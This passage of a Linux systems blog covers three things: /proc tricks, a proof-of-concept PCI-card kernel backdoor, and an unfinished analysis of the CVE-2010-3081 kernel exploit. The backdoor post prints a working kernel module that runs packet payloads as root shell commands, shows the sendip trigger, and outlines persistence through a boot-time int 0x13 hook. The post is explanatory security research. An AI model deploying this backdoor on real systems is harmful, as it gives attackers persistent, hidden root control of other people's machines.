A UNIX process refers to its open files using integers called file descriptors. When we say "standard input", we really mean "file descriptor 0". So we can use /proc/self/fd/0 as an explicit name for standard input:

keegan@lyle$ cat 
import sys
print file(sys.argv[1]).read()
keegan@lyle$ echo hello | python 
IndexError: list index out of range
keegan@lyle$ echo hello | python -
IOError: [Errno 2] No such file or directory: '-'
keegan@lyle$ echo hello | python /proc/self/fd/0

This also works for standard output and standard error, on file descriptors 1 and 2 respectively. This trick is useful enough that many distributions provide symlinks at /dev/stdin, etc.

There are a lot of possibilities for where /proc/self/fd/0 might point:

keegan@lyle$ ls -l /proc/self/fd/0
lrwx------ 1 keegan keegan 64 Jan  6 16:00 /proc/self/fd/0 -> /dev/pts/6
keegan@lyle$ ls -l /proc/self/fd/0 < /dev/null
lr-x------ 1 keegan keegan 64 Jan  6 16:00 /proc/self/fd/0 -> /dev/null
keegan@lyle$ echo | ls -l /proc/self/fd/0
lr-x------ 1 keegan keegan 64 Jan  6 16:00 /proc/self/fd/0 -> pipe:[9159930]

In the first case, stdin is the pseudo-terminal created by my screen session. In the second case it's redirected from a different file. In the third case, stdin is an anonymous pipe. The symlink target isn't a real filename, but proc provides the appropriate magic so that we can read the file anyway. The filesystem nodes for anonymous pipes live in the pipefs special filesystem — specialer than proc, because it can't even be mounted.
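The same inspection can be done from inside a program. This is a rough sketch, assuming Linux with proc mounted at /proc; describe_fd is a hypothetical helper name, not part of any standard tool.

```python
import os
import stat


def describe_fd(fd=0, pid="self"):
    """Return (symlink target, kind) for one of a process's file descriptors."""
    link = f"/proc/{pid}/fd/{fd}"
    target = os.readlink(link)
    mode = os.stat(link).st_mode  # stat follows the link to the underlying object
    if stat.S_ISFIFO(mode):
        kind = "pipe"
    elif stat.S_ISCHR(mode):
        kind = "character device"
    elif stat.S_ISREG(mode):
        kind = "regular file"
    else:
        kind = "other"
    return target, kind


if __name__ == "__main__" and os.path.isdir("/proc/self/fd"):
    print(describe_fd(0))
```

Run it three ways (plainly, with `< /dev/null`, and at the end of a pipeline) to see the three cases above.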

The phantom progress bar

Say we have some program which is slowly working its way through an input file. We'd like a progress bar, but we already launched the program, so it's too late for pv.

Alongside /proc/$PID/fd we have /proc/$PID/fdinfo, which will tell us (among other things) a process's current position within an open file. Let's use this to make a little script that will attach a progress bar to an existing process:

keegan@lyle$ cat phantom-progress.bash
#!/bin/bash
# Usage: phantom-progress.bash PID FD
fd=/proc/$1/fd/$2
fdinfo=/proc/$1/fdinfo/$2
name=$(readlink "$fd")
size=$(wc -c < "$fd")
while [ -e "$fd" ]; do
  progress=$(awk '/^pos/ {print $2}' "$fdinfo")
  echo $((100 * progress / size))
  sleep 1
done | dialog --gauge "Progress reading $name" 7 100

We pass the PID and a file descriptor as arguments. Let's test it:

keegan@lyle$ cat 
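import sys
import time
f = file(sys.argv[1], 'r')
# Read in small chunks with a pause between them, so the read takes a while.
# (The chunk size and delay are arbitrary.)
while f.read(1024):
    time.sleep(0.01)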
keegan@lyle$ python bigfile &
[1] 18589
keegan@lyle$ ls -l /proc/18589/fd
total 0
lrwx------ 1 keegan keegan 64 Jan  6 16:40 0 -> /dev/pts/16
lrwx------ 1 keegan keegan 64 Jan  6 16:40 1 -> /dev/pts/16
lrwx------ 1 keegan keegan 64 Jan  6 16:40 2 -> /dev/pts/16
lr-x------ 1 keegan keegan 64 Jan  6 16:40 3 -> /home/keegan/bigfile
keegan@lyle$ ./phantom-progress.bash 18589 3

And you should see a nice curses progress bar, courtesy of dialog. Or replace dialog with gdialog and you'll get a GTK+ window.
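If you'd rather compute the percentage from another program, the fdinfo lookup is easy to reproduce. Here is a minimal sketch, assuming Linux with proc mounted at /proc; read_position and percent_done are hypothetical names.

```python
import os


def read_position(pid, fd):
    """Return the current file offset recorded in /proc/<pid>/fdinfo/<fd>."""
    with open(f"/proc/{pid}/fdinfo/{fd}") as info:
        for line in info:
            if line.startswith("pos:"):
                return int(line.split()[1])
    raise ValueError("no pos field found")


def percent_done(pid, fd):
    """Percentage of the file behind the descriptor that has been consumed."""
    size = os.stat(f"/proc/{pid}/fd/{fd}").st_size
    if size == 0:
        return 100
    return 100 * read_position(pid, fd) // size
```

Using stat for the size avoids reading the whole file just to count its bytes.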

Chasing plugins

A user comes to you with a problem: every so often, their instance of Enterprise FooServer will crash and burn. You read up on Enterprise FooServer and discover that it's a plugin-riddled behemoth, loading dozens of shared libraries at startup. Loading the wrong library could very well cause mysterious crashing.

The exact set of libraries loaded will depend on the user's config files, as well as environment variables like LD_PRELOAD and LD_LIBRARY_PATH. So you ask the user to start fooserver exactly as they normally do. You get the process's PID and dump its memory map:

keegan@lyle$ cat /proc/21637/maps
00400000-00401000 r-xp 00000000 fe:02 475918             /usr/bin/fooserver
00600000-00601000 rw-p 00000000 fe:02 475918             /usr/bin/fooserver
02519000-0253a000 rw-p 00000000 00:00 0                  [heap]
7ffa5d3c5000-7ffa5d3c6000 r-xp 00000000 fe:02 1286241    /usr/lib/foo-1.2/
7ffa5d3c6000-7ffa5d5c5000 ---p 00001000 fe:02 1286241    /usr/lib/foo-1.2/
7ffa5d5c5000-7ffa5d5c6000 rw-p 00000000 fe:02 1286241    /usr/lib/foo-1.2/
7ffa5d5c6000-7ffa5d5c7000 r-xp 00000000 fe:02 1286243    /usr/lib/foo-1.3/
7ffa5d5c7000-7ffa5d7c6000 ---p 00001000 fe:02 1286243    /usr/lib/foo-1.3/
7ffa5d7c6000-7ffa5d7c7000 rw-p 00000000 fe:02 1286243    /usr/lib/foo-1.3/
7ffa5d7c7000-7ffa5d91f000 r-xp 00000000 fe:02 4055115    /lib/
7ffa5d91f000-7ffa5db1e000 ---p 00158000 fe:02 4055115    /lib/
7ffa5db1e000-7ffa5db22000 r--p 00157000 fe:02 4055115    /lib/
7ffa5db22000-7ffa5db23000 rw-p 0015b000 fe:02 4055115    /lib/
7ffa5db23000-7ffa5db28000 rw-p 00000000 00:00 0 
7ffa5db28000-7ffa5db2a000 r-xp 00000000 fe:02 4055114    /lib/
7ffa5db2a000-7ffa5dd2a000 ---p 00002000 fe:02 4055114    /lib/
7ffa5dd2a000-7ffa5dd2b000 r--p 00002000 fe:02 4055114    /lib/
7ffa5dd2b000-7ffa5dd2c000 rw-p 00003000 fe:02 4055114    /lib/
7ffa5dd2c000-7ffa5dd4a000 r-xp 00000000 fe:02 4055128    /lib/
7ffa5df26000-7ffa5df29000 rw-p 00000000 00:00 0 
7ffa5df46000-7ffa5df49000 rw-p 00000000 00:00 0 
7ffa5df49000-7ffa5df4a000 r--p 0001d000 fe:02 4055128    /lib/
7ffa5df4a000-7ffa5df4b000 rw-p 0001e000 fe:02 4055128    /lib/
7ffa5df4b000-7ffa5df4c000 rw-p 00000000 00:00 0 
7fffedc07000-7fffedc1c000 rw-p 00000000 00:00 0          [stack]
7fffedcdd000-7fffedcde000 r-xp 00000000 00:00 0          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0  [vsyscall]

That's a serious red flag: fooserver is loading the bar plugin from FooServer version 1.2 and the quux plugin from FooServer version 1.3. If the versions aren't binary-compatible, that might explain the mysterious crashes. You can now hassle the user for their config files and try to fix the problem.

Just for fun, let's take a closer look at what the memory map means. Right away, we can recognize a memory address range (first column), a filename (last column), and file-like permission bits rwx. So each line indicates that the contents of a particular file are available to the process at a particular range of addresses with a particular set of permissions. For more details, see the proc manpage.
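To make the column layout concrete, here is a small sketch that splits a maps line into named fields. The field names follow the proc manpage's description; the Mapping type and both function names are my own invention for illustration.

```python
from collections import namedtuple

Mapping = namedtuple("Mapping", "start end perms offset dev inode path")


def parse_maps_line(line):
    """Split one line of /proc/<pid>/maps into its fields."""
    fields = line.split(None, 5)  # the path, if any, is the sixth field
    addr_range, perms, offset, dev, inode = fields[:5]
    path = fields[5].strip() if len(fields) > 5 else ""
    start, end = (int(x, 16) for x in addr_range.split("-"))
    return Mapping(start, end, perms, int(offset, 16), dev, int(inode), path)


def mapped_files(maps_text):
    """Return the sorted set of file paths that appear in a maps listing."""
    lines = [l for l in maps_text.splitlines() if l.strip()]
    return sorted({m.path for m in map(parse_maps_line, lines)
                   if m.path.startswith("/")})
```

Feeding the contents of /proc/$PID/maps to mapped_files gives a de-duplicated list of every file the process has mapped, which is a quick way to spot mismatched library versions.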

The executable itself is mapped twice: once for executing code, and once for reading and writing data. The same is true of the shared libraries. The flag p indicates a private mapping: changes to this memory area will not be shared with other processes, or saved to disk. We certainly don't want the global variables in a shared library to be shared by every process which loads that library. If you're wondering, as I was, why some library mappings have no access permissions, see this glibc source comment. There are also a number of "anonymous" mappings lacking filenames; these exist in memory only. An allocator like malloc can ask the kernel for such a mapping, then parcel out this storage as the application requests it.

The last two entries are special creatures which aim to reduce system call overhead. At boot time, the kernel will determine the fastest way to make a system call on your particular CPU model. It builds this instruction sequence into a little shared library in memory, and provides this virtual dynamic shared object (named vdso) for use by userspace code. Even so, the overhead of switching to the kernel context should be avoided when possible. Certain system calls such as gettimeofday are merely reading information maintained by the kernel. The kernel will store this information in the public virtual system call page (named vsyscall), so that these "system calls" can be implemented entirely in userspace.

Counting interruptions

We have a process which is taking a long time to run. How can we tell if it's CPU-bound or IO-bound?

When a process makes a system call, the kernel might let a different process run for a while before servicing the request. This voluntary context switch is especially likely if the system call requires waiting for some resource or event. If a process is only doing pure computation, it's not making any system calls. In that case, the kernel uses a hardware timer interrupt to eventually perform a nonvoluntary context switch.

The file /proc/$PID/status has fields labeled voluntary_ctxt_switches and nonvoluntary_ctxt_switches showing how many of each event have occurred. Let's try our slow reader process from before:

keegan@lyle$ python bigfile &
[1] 15264
keegan@lyle$ watch -d -n 1 'cat /proc/15264/status | grep ctxt_switches'

You should see mostly voluntary context switches. Our program calls into the kernel in order to read or sleep, and the kernel can decide to let another process run for a while. We could use strace to see the individual calls. Now let's try a tight computational loop:

keegan@lyle$ cat tightloop.c
int main() {
  while (1) {
  }
}
keegan@lyle$ gcc -Wall -o tightloop tightloop.c
keegan@lyle$ ./tightloop &
[1] 30086
keegan@lyle$ watch -d -n 1 'cat /proc/30086/status | grep ctxt_switches'

You'll see exclusively nonvoluntary context switches. This program isn't making system calls; it just spins the CPU until the kernel decides to let someone else have a turn. Don't forget to kill this useless process!
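The two counters are easy to pull out programmatically as well. The sketch below parses the text of /proc/$PID/status. The classify function is a deliberately crude heuristic of my own (it compares lifetime totals), so treat it as an illustration rather than a real profiler.

```python
def context_switches(status_text):
    """Extract (voluntary, nonvoluntary) switch counts from /proc/<pid>/status text."""
    counts = {}
    for line in status_text.splitlines():
        key, _, value = line.partition(":")
        if key.endswith("ctxt_switches"):
            counts[key] = int(value)
    return counts["voluntary_ctxt_switches"], counts["nonvoluntary_ctxt_switches"]


def classify(status_text):
    """Rough guess: more voluntary switches suggests waiting, fewer suggests computing."""
    voluntary, nonvoluntary = context_switches(status_text)
    return "mostly waiting" if voluntary >= nonvoluntary else "mostly computing"
```

For a long-running process it is more informative to sample twice and compare the differences, which is what watch -d makes visible above.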

Staying ahead of the OOM killer

The Linux memory subsystem has a nasty habit of making promises it can't keep. A userspace program can successfully allocate as much memory as it likes. The kernel will only look for free space in physical memory once the program actually writes to the addresses it allocated. And if the kernel can't find enough space, a component called the OOM killer will use an ad-hoc heuristic to choose a victim process and unceremoniously kill it.

Needless to say, this feature is controversial. The kernel has no reliable idea of who's actually responsible for consuming the machine's memory. The victim process may be totally innocent. You can disable memory overcommitting on your own machine, but there's inherent risk in breaking assumptions that processes make — even when those assumptions are harmful.

As a less drastic step, let's keep an eye on the OOM killer so we can predict where it might strike next. The victim process will be the process with the highest "OOM score", which we can read from /proc/$PID/oom_score:

keegan@lyle$ cat oom-scores.bash
for procdir in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+'); do
  printf "%10d %6d %s\n" \
    "$(cat $procdir/oom_score)" \
    "$(basename $procdir)" \
    "$(cat $procdir/cmdline | tr '\0' ' ' | head -c 100)"
done 2>/dev/null | sort -nr | head -n 20

For each process we print the OOM score, the PID (obtained from the directory name) and the process's command line. proc provides string arrays in NUL-delimited format, which we convert using tr. It's important to suppress error output using 2>/dev/null because some of the processes found by find (including find itself) will no longer exist within the loop. Let's see the results:

keegan@lyle$ ./oom-scores.bash 
  13647872  15439 /usr/lib/chromium-browser/chromium-browser --type=plugin
   1516288  15430 /usr/lib/chromium-browser/chromium-browser --type=gpu-process
   1006592  13204 /usr/lib/nspluginwrapper/i386/linux/npviewer.bin --plugin
    687581  15264 /usr/lib/chromium-browser/chromium-browser --type=zygote
    445352  14323 /usr/lib/chromium-browser/chromium-browser --type=renderer
    444930  11255 /usr/lib/chromium-browser/chromium-browser --type=renderer

Unsurprisingly, my web browser and Flash plugin are prime targets for the OOM killer. But the rankings might change if some runaway process caused an actual out-of-memory condition. Let's (carefully!) run a program that will (slowly!) eat 500 MB of RAM:

keegan@lyle$ cat oomnomnom.c
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>
#define SIZE (10*1024*1024)

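int main() {
  int i;
  for (i=0; i<50; i++) {
    /* Ask for a private, anonymous (non-file-backed) mapping. */
    void *m = mmap(NULL, SIZE, PROT_WRITE,
      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (m == MAP_FAILED)
      return 1;
    /* Touch every page so the kernel must back it with physical RAM. */
    memset(m, 0x80, SIZE);
    sleep(1);
  }
  return 0;
}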

On each loop iteration, we ask for 10 megabytes of memory as a private, anonymous (non-file-backed) mapping. We then write to this region, so that the kernel will have to allocate some physical RAM. Now we'll watch OOM scores and free memory as this program runs:

keegan@lyle$ gcc -Wall -o oomnomnom oomnomnom.c
keegan@lyle$ ./oomnomnom &
[1] 19697
keegan@lyle$ watch -d -n 1 './oom-scores.bash; echo; free -m'

You'll see oomnomnom climb to the top of the list.
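For comparison, here is roughly the same ranking written in Python. It is a sketch that assumes Linux with proc mounted at /proc; format_cmdline and oom_ranking are hypothetical names. Instead of discarding stderr, it skips processes that vanish mid-scan by catching the exception.

```python
import os


def format_cmdline(raw, limit=100):
    """Turn the NUL-delimited bytes of /proc/<pid>/cmdline into a printable string."""
    return raw.replace(b"\0", b" ").decode(errors="replace").strip()[:limit]


def oom_ranking(top=20):
    """Return up to `top` (score, pid, cmdline) tuples, highest OOM score first."""
    rows = []
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        try:
            with open(f"/proc/{name}/oom_score") as f:
                score = int(f.read())
            with open(f"/proc/{name}/cmdline", "rb") as f:
                cmdline = format_cmdline(f.read())
        except (OSError, ValueError):
            continue  # the process exited while we were looking
        rows.append((score, int(name), cmdline))
    return sorted(rows, reverse=True)[:top]


if __name__ == "__main__" and os.path.isdir("/proc/self"):
    for score, pid, cmdline in oom_ranking():
        print("%10d %6d %s" % (score, pid, cmdline))
```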

So we've seen a few ways that proc can help us solve problems. Actually, we've only scratched the surface. Inside each process's directory you'll find information about resource limits, chroots, CPU affinity, page faults, and much more. What are your favorite proc tricks? Let us know in the comments!


Tuesday Oct 26, 2010

Hosting backdoors in hardware

Have you ever had a machine get compromised? What did you do? Did you run rootkit checkers and reboot? Did you restore from backups or wipe and reinstall the machines, to remove any potential backdoors?

In some cases, that may not be enough. In this blog post, we're going to describe how we can gain full control of someone's machine by giving them a piece of hardware which they install into their computer. The backdoor won't leave any trace on the disk, so it won't be eliminated even if the operating system is reinstalled. It's important to note that our ability to do this does not depend on exploiting any bugs in the operating system or other software; our hardware-based backdoor would work even if all the software on the system worked perfectly as designed.

I'll let you figure out the social engineering side of getting the hardware installed (birthday "present"?), and instead focus on some of the technical details involved.

Our goal is to produce a PCI card which, when present in a machine running Linux, modifies the kernel so that we can control the machine remotely over the Internet. We're going to make the simplifying assumption that we have a virtual machine which is a replica of the actual target machine. In particular, we know the architecture and exact kernel version of the target machine. Our proof-of-concept code will be written to only work on this specific kernel version, but it's mainly just a matter of engineering effort to support a wide range of kernels.

Modifying the kernel with a kernel module

The easiest way to modify the behavior of our kernel is by loading a kernel module. Let's start by writing a module that will allow us to remotely control a machine.

IP packets have a field called the protocol number, which is how systems distinguish between TCP and UDP and other protocols. We're going to pick an unused protocol number, say, 163, and have our module listen for packets with that protocol number. When we receive one, we'll execute its data payload in a shell running as root. This will give us complete remote control of the machine.
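To see where the protocol number lives, here is a small sketch that builds a bare 20-byte IPv4 header in memory and reads the field back out. The function names are hypothetical and the addresses come from a documentation-only range. The checksum is left at zero, so this is a layout illustration rather than a packet you could put on the wire.

```python
import socket
import struct


def build_ipv4_header(protocol, payload_len, src="192.0.2.1", dst="192.0.2.2"):
    """Pack a minimal IPv4 header (no options, checksum left as 0)."""
    version_ihl = (4 << 4) | 5  # IPv4, header length of 5 32-bit words
    return struct.pack(
        "!BBHHHBBH4s4s",
        version_ihl, 0, 20 + payload_len,  # version/IHL, TOS, total length
        0, 0,                              # identification, flags/fragment offset
        64, protocol, 0,                   # TTL, protocol number, checksum
        socket.inet_aton(src), socket.inet_aton(dst),
    )


def protocol_and_payload(packet):
    """Return (protocol number, payload bytes) for a raw IPv4 packet."""
    header_len = (packet[0] & 0x0F) * 4
    return packet[9], packet[header_len:]
```

TCP packets carry 6 in this field and UDP packets carry 17; the module described here claims 163 for itself.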

The Linux kernel has a global table inet_protos consisting of a struct net_protocol * for each protocol number. The important field for our purposes is handler, a pointer to a function which takes a single argument of type struct sk_buff *. Whenever the Linux kernel receives an IP packet, it looks up the entry in inet_protos corresponding to the protocol number of the packet, and if the entry is not NULL, it passes the packet to the handler function. The struct sk_buff type is quite complicated, but the only field we care about is the data field, which is a pointer to the beginning of the payload of the packet (everything after the IP header). We want to pass the payload as commands to a shell running with root privileges. We can create a user-mode process running as root using the call_usermodehelper function, so our handler looks like this:

int exec_packet(struct sk_buff *skb)
{
	/* The packet payload becomes the command string for "sh -c". */
	char *argv[4] = {"/bin/sh", "-c", skb->data, NULL};
	char *envp[1] = {NULL};
	call_usermodehelper("/bin/sh", argv, envp, UMH_NO_WAIT);
	kfree_skb(skb);
	return 0;
}

We also have to define a struct net_protocol which points to our packet handler, and register it when our module is loaded:

const struct net_protocol proto163_protocol = {
	.handler = exec_packet,
	.no_policy = 1,
	.netns_ok = 1
};

int init_module(void)
{
	return (inet_add_protocol(&proto163_protocol, 163) < 0);
}

Let's build and load the module:

rwbarton@target:~$ make
make -C /lib/modules/2.6.32-24-generic/build M=/home/rwbarton modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.32-24-generic'
  CC [M]  /home/rwbarton/exec163.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /home/rwbarton/exec163.mod.o
  LD [M]  /home/rwbarton/exec163.ko
make[1]: Leaving directory `/usr/src/linux-headers-2.6.32-24-generic'
rwbarton@target:~$ sudo insmod exec163.ko

Now we can use sendip (available in the sendip Ubuntu package) to construct and send a packet with protocol number 163 from a second machine (named control) to the target machine:

rwbarton@control:~$ echo -ne 'touch /tmp/x\0' > payload
rwbarton@control:~$ sudo sendip -p ipv4 -is 0 -ip 163 -f payload $targetip
rwbarton@target:~$ ls -l /tmp/x
-rw-r--r-- 1 root root 0 2010-10-12 14:53 /tmp/x

Great! It worked. Note that we have to send a null-terminated string in the payload, because that's what call_usermodehelper expects to find in argv and we didn't add a terminator in exec_packet.

Modifying the on-disk kernel

In the previous section we used the module loader to make our changes to the running kernel. Our next goal is to make these changes by altering the kernel on the disk. This is basically an application of ordinary binary patching techniques, so we're just going to give a high-level overview of what needs to be done.

The kernel lives in the /boot directory; on my test system, it's called /boot/vmlinuz-2.6.32-24-generic. This file actually contains a compressed version of the kernel, along with the code which decompresses it and then jumps to the start. We're going to modify this code to make a few changes to the decompressed image before executing it, which have the same effect as loading our kernel module did in the previous section.

When we used the kernel module loader to make our changes to the kernel, the module loader performed three important tasks for us:

  1. it allocated kernel memory to store our kernel module, including both code (the exec_packet function) and data (proto163_protocol and the string constants in exec_packet) sections;
  2. it performed relocations, so that, for example, exec_packet knows the addresses of the kernel functions it needs to call such as kfree_skb, as well as the addresses of its string constants;
  3. it ran our init_module function.
We have to address each of these points in figuring out how to apply our changes without making use of the module loader.

The second and third points are relatively straightforward thanks to our simplifying assumption that we know the exact kernel version on the target system. We can look up the addresses of the kernel functions our module needs to call by hand, and define them as constants in our code. We can also easily patch the kernel's startup function to install a pointer to our proto163_protocol in inet_protos[163], since we have an exact copy of its code.

The first point is a little tricky. Normally, we would call kmalloc to allocate some memory to store our module's code and data, but we need to make our changes before the kernel has started running, so the memory allocator won't be initialized yet. We could try to find some code to patch that runs late enough that it is safe to call kmalloc, but we'd still have to find somewhere to store that extra code.

What we're going to do is cheat and find some data which isn't used for anything terribly important, and overwrite it with our own data. In general, it's hard to be sure what a given chunk of kernel image is used for; even a large chunk of zeros might be part of an important lookup table. However, we can be rather confident that any error messages in the kernel image are not used for anything besides being displayed to the user. We just need to find an error message which is long enough to provide space for our data, and obscure enough that it's unlikely to ever be triggered. We'll need well under 180 bytes for our data, so let's look for strings in the kernel image which are at least that long:

rwbarton@target:~$ strings vmlinux | egrep  '^.{180}' | less

One of the output lines is this one:

<4>Attempt to access file with crypto metadata only in the extended attribute region, but eCryptfs was mounted without xattr support enabled. eCryptfs will not treat this like an encrypted file.

This sounds pretty obscure to me, and a Google search doesn't find any occurrences of this message which aren't from the kernel source code. So, we're going to just overwrite it with our data.
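The strings-and-egrep search can also be done in a few lines of Python, which has the advantage of reporting where in the image each candidate lives. This is a sketch: long_strings is a hypothetical helper, and unlike strings it counts only the printable ASCII range 0x20 to 0x7e, so tabs end a run.

```python
import re


def long_strings(image, min_len=180):
    """Yield (offset, text) for each run of printable ASCII at least min_len long."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    for match in pattern.finditer(image):
        yield match.start(), match.group().decode("ascii")
```

Calling it on the bytes of the decompressed image, for example `long_strings(open("vmlinux", "rb").read())`, lists each sufficiently long message together with its byte offset.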

Having worked out what changes need to be applied to the decompressed kernel, we can modify the vmlinuz file so that it applies these changes after performing the decompression. Again, we need to find a place to store our added code, and conveniently enough, there are a bunch of strings used as error messages (in case decompression fails). We don't expect the decompression to fail, because we didn't modify the compressed image at all. So we'll overwrite those error messages with code that applies our patches to the decompressed kernel, and modify the code in vmlinuz that decompresses the kernel to jump to our code after doing so. The changes amount to 5 bytes to write that jmp instruction, and about 200 bytes for the code and data that we use to patch the decompressed kernel.

Modifying the kernel during the boot process

Our end goal, however, is not to actually modify the on-disk kernel at all, but to create a piece of hardware which, if present in the target machine when it is booted, will cause our changes to be applied to the kernel. How can we accomplish that?

The PCI specification defines an "expansion ROM" mechanism whereby a PCI card can include a bit of code for the BIOS to execute during the boot procedure. This is intended to give the hardware a chance to initialize itself, but we can also use it for our own purposes. To figure out what code we need to include on our expansion ROM, we need to know a little more about the boot process.

When a machine boots up, the BIOS initializes the hardware, then loads the master boot record from the boot device, generally a hard drive. Disks are traditionally divided into conceptual units called sectors of 512 bytes each. The master boot record is the first sector on the drive. After loading the master boot record into memory, the BIOS jumps to the beginning of the record.

On my test system, the master boot record was installed by GRUB. It contains code to load the rest of the GRUB boot loader, which in turn loads the /boot/vmlinuz-2.6.32-24-generic image from the disk and executes it. GRUB contains a built-in driver which understands the ext4 filesystem layout. However, it relies on the BIOS to actually read data from the disk, in much the same way that a user-level program relies on an operating system to access the hardware. Roughly speaking, when GRUB wants to read some sectors off the disk, it loads the start sector, number of sectors to read, and target address into registers, and then invokes the int 0x13 instruction to raise an interrupt. The CPU has a table of interrupt descriptors, which specify for each interrupt number a function pointer to call when that interrupt is raised. During initialization, the BIOS sets up these function pointers so that, for example, the entry corresponding to interrupt 0x13 points to the BIOS code handling hard drive IO.

Our expansion ROM is run after the BIOS sets up these interrupt descriptors, but before the master boot record is read from the disk. So what we'll do in the expansion ROM code is overwrite the entry for interrupt 0x13. This is actually a legitimate technique which we would use if we were writing an expansion ROM for some kind of exotic hard drive controller, which a generic BIOS wouldn't know how to read, so that we could boot off of the exotic hard drive. In our case, though, what we're going to make the int 0x13 handler do is to call the original interrupt handler, then check whether the data we read matches one of the sectors of /boot/vmlinuz-2.6.32-24-generic that we need to patch. The ext4 filesystem stores files aligned on sector boundaries, so we can easily determine whether we need to patch a sector that's just been read by inspecting the first few bytes of the sector. Then we return from our custom int 0x13 handler. The code for this handler will be stored on our expansion ROM, and the entry point of our expansion ROM will set up the interrupt descriptor entry to point to it.
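The shape of that hook (call the original handler, inspect what came back, patch on a match) can be modeled in ordinary Python on an in-memory "disk". This is purely a toy illustration of the control flow; the function names, the marker bytes, and the patch format are all made up, and the real handler is real-mode code on the ROM.

```python
SECTOR = 512


def make_hooked_reader(original_read, patches):
    """Wrap a sector-reading function so that matching sectors are patched in flight.

    patches maps an expected sector prefix to (offset within sector, new bytes).
    """
    def hooked_read(start, count):
        data = bytearray(original_read(start, count))  # call the original handler first
        for base in range(0, len(data), SECTOR):
            for prefix, (offset, new) in patches.items():
                if data.startswith(prefix, base):      # inspect the first few bytes
                    data[base + offset:base + offset + len(new)] = new
        return bytes(data)
    return hooked_read
```

Because the wrapper only changes the bytes returned to the caller, the underlying disk contents are never touched.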

In summary, the boot process of the system with our PCI card inserted looks like this:

  • The BIOS starts up and performs basic initialization, including setting up the interrupt descriptor table.
  • The BIOS runs our expansion ROM code, which hooks the int 0x13 handler so that it will apply our patch to the vmlinuz file when it is read off the disk.
  • The BIOS loads the master boot record installed by GRUB, and jumps to it. The master boot record loads the rest of GRUB.
  • GRUB reads the vmlinuz file from the disk, but our custom int 0x13 handler applies our patches to the kernel before returning.
  • GRUB jumps to the vmlinuz entry point, which decompresses the kernel image. Our modifications to vmlinuz cause it to overwrite a string constant with our exec_packet function and associated data, and also to overwrite the end of the startup code to install a pointer to this data in inet_protos[163].
  • The startup code of the decompressed kernel runs and installs our handler in inet_protos[163].
  • The kernel continues to boot normally.
We can now control the machine remotely over the Internet by sending it packets with protocol number 163.

One neat thing about this setup is that it's not so easy to detect that anything unusual has happened. The running Linux system reads from the disk using its own drivers, not BIOS calls via the real-mode interrupt table, so inspecting the on-disk kernel image will correctly show that it is unmodified. For the same reason, if we use our remote control of the machine to install some malicious software which is then detected by the system administrator, the usual procedure of reinstalling the operating system and restoring data from backups will not remove our backdoor, since it is not stored on the disk at all.

What does all this mean in practice? Just like you should not run untrusted software, you should not install hardware provided by untrusted sources. Unless you work for something like a government intelligence agency, though, you shouldn't realistically worry about installing commodity hardware from reputable vendors. After all, you're already also trusting the manufacturer of your processor, RAM, etc., as well as your operating system and compiler providers. Of course, most real-world vulnerabilities are due to mistakes and not malice. An attacker can gain control of systems by exploiting bugs in popular operating systems much more easily than by distributing malicious hardware.


Wednesday Sep 22, 2010

Anatomy of an exploit: CVE-2010-3081

It has been an exciting week for most people running 64-bit Linux systems. Shortly after "Ac1dB1tch3z" released his or her exploit of the vulnerability known as CVE-2010-3081, we saw this exploit aggressively compromising machines, with reports of compromises all over the hosting industry and many machines using our diagnostic tool and testing positive for the backdoors left by the exploit.

The talk around the exploit has mostly been panic and mitigation, though, so now that people have had time to patch their machines and triage their compromised systems, what I'd like to do for you today is talk about how this bug worked, how the exploit worked, and what we can learn about Linux security.

The Ingredients of an Exploit

There are three basic ingredients that typically go into a kernel exploit: the bug, the target, and the payload. The exploit triggers the bug -- a flaw in the kernel -- to write evil data corrupting the target, which is some kernel data structure. Then it prods the kernel to look at that evil data and follow it to run the payload, a snippet of code that gives the exploit the run of the system.

The bug is the one ingredient that is unique to a particular vulnerability. The target and the payload may be reused by an attacker in exploits for other vulnerabilities -- if 'Ac1dB1tch3z' didn't already copy them from an earlier exploit, his or her own or someone else's, he or she will probably reuse them in future exploits.

Let's look at each of these in more detail.

The Bug: CVE-2010-3081

An exploit starts with a bug, or vulnerability, some kernel flaw that allows a malicious user to make a mess -- to write onto its target in the kernel. This bug is called CVE-2010-3081, and it allows a user to write a handful of words into memory almost anywhere in the kernel.

The bug was present in Linux's 'compat' subsystem, which is used on 64-bit systems to maintain compatibility with 32-bit binaries by providing all the system calls in 32-bit form. Now Linux has over 300 different system calls, so this was a big job. The Linux developers made certain choices in order to keep the task manageable:

  • We don't want to rewrite the code that actually does the work of each system call, so instead we have a little wrapper function for compat mode.
  • The wrapper function needs to take arguments from userspace in 32-bit form, then put them in 64-bit form to pass to the code that does the system call's work. Often some arguments are structs which are laid out differently in the 32-bit and 64-bit worlds, so we have to make a new 64-bit struct based on the user's 32-bit struct.
  • The code that does the work expects to find the struct in the user's address space, so we have to put ours there. Where in userspace can we find space without stepping on toes? The compat subsystem provides a function to find it on the user's stack.
Now, here's the core problem. That allocation routine went like this:

  static inline void __user *compat_alloc_user_space(long len)
  {
          struct pt_regs *regs = task_pt_regs(current);
          return (void __user *)regs->sp - len;
  }

The way you use it looks a lot like the old familiar malloc(), or the kernel's kmalloc(), or any number of other memory-allocation routines: you pass in the number of bytes you need, and it returns a pointer where you are supposed to read and write that many bytes to your heart's content. But it comes -- came -- with a special catch, and it's a big one: before you used that memory, you had to check that it was actually OK for the user to use that memory, with the kernel's access_ok() function. If you've ever helped maintain a large piece of software, you know it's inevitable that someone will eventually be fooled by the analogy, miss the incongruence, and forget that check.

Fortunately the kernel developers are smart and careful people, and they defied that inevitability almost everywhere. Unfortunately, they missed it in at least two places. One of those is this bug. If we call getsockopt() in 32-bit fashion on the socket that represents a network connection over IP, and pass an optname of MCAST_MSFILTER, then in a 64-bit kernel we end up in compat_mc_getsockopt():

  int compat_mc_getsockopt(struct sock *sock, int level, int optname,
          char __user *optval, int __user *optlen,
          int (*getsockopt)(struct sock *,int,int,char __user *,int __user *))
This function calls compat_alloc_user_space(), and it fails to check the result is OK for the user to access -- and by happenstance the struct it's making room for has a variable length, supplied by the user.

So the attacker's strategy goes like so:

